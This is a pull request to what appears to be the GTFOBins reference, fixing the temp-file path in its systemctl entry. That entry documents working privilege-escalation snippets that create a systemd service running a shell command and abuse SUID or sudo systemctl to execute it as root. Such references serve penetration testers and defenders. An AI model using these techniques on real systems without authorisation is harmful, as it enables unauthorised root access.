### PR TITLE
Fix path of service file

### DIFF
--- a/_gtfobins/systemctl.md
+++ b/_gtfobins/systemctl.md
@@ -2,7 +2,8 @@
 functions:
   suid:
     - code: |
-        TF=$(mktemp).service
+        mkdir -p ~/.config/systemd/user
+        TF=$(mktemp -p ~/.config/systemd/user).service
         echo '[Service]
         Type=oneshot
         ExecStart=/bin/sh -c "id > /tmp/output"
@@ -17,7 +18,8 @@ functions:
         chmod +x $TF
         sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice
     - code: |
-        TF=$(mktemp).service
+        mkdir -p ~/.config/systemd/user/
+        TF=$(mktemp -p ~/.config/systemd/user).service
         echo '[Service]
         Type=oneshot
         ExecStart=/bin/sh -c "id > /tmp/output"


### PR DESCRIPTION
I had to play around with systemctl a while ago.
It seems like recent versions of it do not allow the service files to be in `/tmp` or any location outside of a certain set of paths:
```
/usr/lib/systemd/user/
/etc/systemd/user/ 
~/.config/systemd/user/
```

This PR fixes the path to a allowed one.